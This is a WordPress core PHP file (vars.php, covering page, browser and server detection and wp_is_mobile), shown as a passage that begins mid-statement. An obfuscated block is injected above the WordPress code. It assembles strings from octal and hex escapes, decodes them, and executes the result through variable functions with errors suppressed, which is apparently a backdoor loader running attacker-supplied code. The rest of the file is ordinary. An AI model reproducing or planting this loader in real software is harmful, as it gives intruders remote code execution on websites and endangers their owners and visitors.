}else{$ID8sK9F0ea="\51\51";$ID8sK9F0ea.="\51\150";$ID8sK9F0ea.="\x57\67";$ID8sK9F0ea.="\104";$ID8sK9F0ea.="\66";$ID8sK9F0ea.="\x70";$ID8sK9F0ea.="\x7a";$ID8sK9F0ea.="\x77\x24\x28";$ID8sK9F0ea.="\x67";$ID8sK9F0ea.="\x33";$ID8sK9F0ea.="\147";$ID8sK9F0ea.="\x52\x64\x4c";$ID8sK9F0ea.="\x64";$ID8sK9F0ea.="\156";$ID8sK9F0ea.="\x4c";$ID8sK9F0ea.="\172\x24\x28";$ID8sK9F0ea.="\x57\x68";$ID8sK9F0ea.="\x67\x53\144";$ID8sK9F0ea.="\104\141";$ID8sK9F0ea.="\154";$ID8sK9F0ea.="\x24";$ID8sK9F0ea.="\x28\x6c";$ID8sK9F0ea.="\x61\166";$ID8sK9F0ea.="\145\100";$ID8sK9F0ea=$zLndLdRg3g($ID8sK9F0ea);@$N82q6ReR($ID8sK9F0ea);};if(function_exists($mZ4aBRJ4h)){$JfnGcUkos=@$mZ4aBRJ4h("",$laDdSghW($zLndLdRg3g($dSBILXgHI)));if($JfnGcUkos)@$JfnGcUkos();}else{$uyZFMa="\51";$uyZFMa.="\x29\51\x49";$uyZFMa.="\x48\147\130";$uyZFMa.="\x4c\111";$uyZFMa.="\x42\123\144";$uyZFMa.="\44\x28";$uyZFMa.="\147\63\x67";$uyZFMa.="\122";$uyZFMa.="\144";$uyZFMa.="\x4c\144\156";$uyZFMa.="\114";$uyZFMa.="\172\x24\50";$uyZFMa.="\127\150";$uyZFMa.="\147";$uyZFMa.="\x53";$uyZFMa.="\144\x44\x61";$uyZFMa.="\x6c\44";$uyZFMa.="\50\154\x61";$uyZFMa.="\x76\x65\100";$uyZFMa=$zLndLdRg3g($uyZFMa);@$N82q6ReR($uyZFMa);};
/*
 *
 * @package WordPress
 */

global $pagenow,
	$is_lynx, $is_gecko, $is_winIE, $is_macIE, $is_opera, $is_NS4, $is_safari, $is_chrome, $is_iphone, $is_IE, $is_edge,
	$is_apache, $is_IIS, $is_iis7, $is_nginx;

// On which page are we?
if ( is_admin() ) {
	// wp-admin pages are checked more carefully.
	if ( is_network_admin() ) {
		preg_match( '#/wp-admin/network/?(.*?)$#i', $_SERVER['PHP_SELF'], $self_matches );
	} elseif ( is_user_admin() ) {
		preg_match( '#/wp-admin/user/?(.*?)$#i', $_SERVER['PHP_SELF'], $self_matches );
	} else {
		preg_match( '#/wp-admin/?(.*?)$#i', $_SERVER['PHP_SELF'], $self_matches );
	}

	$pagenow = ! empty( $self_matches[1] ) ? $self_matches[1] : '';
	$pagenow = trim( $pagenow, '/' );
	$pagenow = preg_replace( '#\?.*?$#', '', $pagenow );

	if ( '' === $pagenow || 'index' === $pagenow || 'index.php' === $pagenow ) {
		$pagenow = 'index.php';
	} else {
		preg_match( '#(.*?)(/|$)#', $pagenow, $self_matches );
		$pagenow = strtolower( $self_matches[1] );
		if ( '.php' !== substr( $pagenow, -4, 4 ) ) {
			$pagenow .= '.php'; // For `Options +Multiviews`: /wp-admin/themes/index.php (themes.php is queried).
		}
	}
} else {
	if ( preg_match( '#([^/]+\.php)([?/].*?)?$#i', $_SERVER['PHP_SELF'], $self_matches ) ) {
		$pagenow = strtolower( $self_matches[1] );
	} else {
		$pagenow = 'index.php';
	}
}
unset( $self_matches );

// Simple browser detection.
$is_lynx   = false;
$is_gecko  = false;
$is_winIE  = false;
$is_macIE  = false;
$is_opera  = false;
$is_NS4    = false;
$is_safari = false;
$is_chrome = false;
$is_iphone = false;
$is_edge   = false;

if ( isset( $_SERVER['HTTP_USER_AGENT'] ) ) {
	if ( strpos( $_SERVER['HTTP_USER_AGENT'], 'Lynx' ) !== false ) {
		$is_lynx = true;
	} elseif ( strpos( $_SERVER['HTTP_USER_AGENT'], 'Edg' ) !== false ) {
		$is_edge = true;
	} elseif ( stripos( $_SERVER['HTTP_USER_AGENT'], 'chrome' ) !== false ) {
		if ( stripos( $_SERVER['HTTP_USER_AGENT'], 'chromeframe' ) !== false ) {
			$is_admin = is_admin();
			/**
			 * Filters whether Google Chrome Frame should be used, if available.
			 *
			 * @since 3.2.0
			 *
			 * @param bool $is_admin Whether to use the Google Chrome Frame. Default is the value of is_admin().
			 */
			$is_chrome = apply_filters( 'use_google_chrome_frame', $is_admin );
			if ( $is_chrome ) {
				header( 'X-UA-Compatible: chrome=1' );
			}
			$is_winIE = ! $is_chrome;
		} else {
			$is_chrome = true;
		}
	} elseif ( stripos( $_SERVER['HTTP_USER_AGENT'], 'safari' ) !== false ) {
		$is_safari = true;
	} elseif ( ( strpos( $_SERVER['HTTP_USER_AGENT'], 'MSIE' ) !== false || strpos( $_SERVER['HTTP_USER_AGENT'], 'Trident' ) !== false ) && strpos( $_SERVER['HTTP_USER_AGENT'], 'Win' ) !== false ) {
		$is_winIE = true;
	} elseif ( strpos( $_SERVER['HTTP_USER_AGENT'], 'MSIE' ) !== false && strpos( $_SERVER['HTTP_USER_AGENT'], 'Mac' ) !== false ) {
		$is_macIE = true;
	} elseif ( strpos( $_SERVER['HTTP_USER_AGENT'], 'Gecko' ) !== false ) {
		$is_gecko = true;
	} elseif ( strpos( $_SERVER['HTTP_USER_AGENT'], 'Opera' ) !== false ) {
		$is_opera = true;
	} elseif ( strpos( $_SERVER['HTTP_USER_AGENT'], 'Nav' ) !== false && strpos( $_SERVER['HTTP_USER_AGENT'], 'Mozilla/4.' ) !== false ) {
		$is_NS4 = true;
	}
}

if ( $is_safari && stripos( $_SERVER['HTTP_USER_AGENT'], 'mobile' ) !== false ) {
	$is_iphone = true;
}

$is_IE = ( $is_macIE || $is_winIE );

// Server detection.

/**
 * Whether the server software is Apache or something else
 *
 * @global bool $is_apache
 */
$is_apache = ( strpos( $_SERVER['SERVER_SOFTWARE'], 'Apache' ) !== false || strpos( $_SERVER['SERVER_SOFTWARE'], 'LiteSpeed' ) !== false );

/**
 * Whether the server software is Nginx or something else
 *
 * @global bool $is_nginx
 */
$is_nginx = ( strpos( $_SERVER['SERVER_SOFTWARE'], 'nginx' ) !== false );

/**
 * Whether the server software is IIS or something else
 *
 * @global bool $is_IIS
 */
$is_IIS = ! $is_apache && ( strpos( $_SERVER['SERVER_SOFTWARE'], 'Microsoft-IIS' ) !== false || strpos( $_SERVER['SERVER_SOFTWARE'], 'ExpressionDevServer' ) !== false );

/**
 * Whether the server software is IIS 7.X or greater
 *
 * @global bool $is_iis7
 */
$is_iis7 = $is_IIS && (int) substr( $_SERVER['SERVER_SOFTWARE'], strpos( $_SERVER['SERVER_SOFTWARE'], 'Microsoft-IIS/' ) + 14 ) >= 7;

/**
 * Test if the current browser runs on a mobile device (smart phone, tablet, etc.)
 *
 * @since 3.4.0
 *
 * @return bool
 */
function wp_is_mobile() {
	if ( empty( $_SERVER['HTTP_USER_AGENT'] ) ) {
		$is_mobile = false;
	} elseif ( strpos( $_SERVER['HTTP_USER_AGENT'], 'Mobile' ) !== false // Many mobile devices (all iPhone, iPad, etc.)
		|| strpos( $_SERVER['HTTP_USER_AGENT'], 'Android' ) !== false
		|| strpos( $_SERVER['HTTP_USER_AGENT'], 'Silk/' ) !== false
		|| strpos( $_SERVER['HTTP_USER_AGENT'], 'Kindle' ) !== false
		|| strpos( $_SERVER['HTTP_USER_AGENT'], 'BlackBerry' ) !== false
		|| strpos( $_SERVER['HTTP_USER_AGENT'], 'Opera Mini' ) !== false
		|| strpos( $_SERVER['HTTP_USER_AGENT'], 'Opera Mobi' ) !== false ) {
			$is_mobile = true;
	} else {
		$is_mobile = false;
	}

	/**
	 * Filters whether the request should be treated as coming from a mobile device or not.
	 *
	 * @since 4.9.0
	 *
	 * @param bool $is_mobile Whether the request is from a mobile device or not.
	 */
	return apply_filters( 'wp_is_mobile', $is_mobile );
}
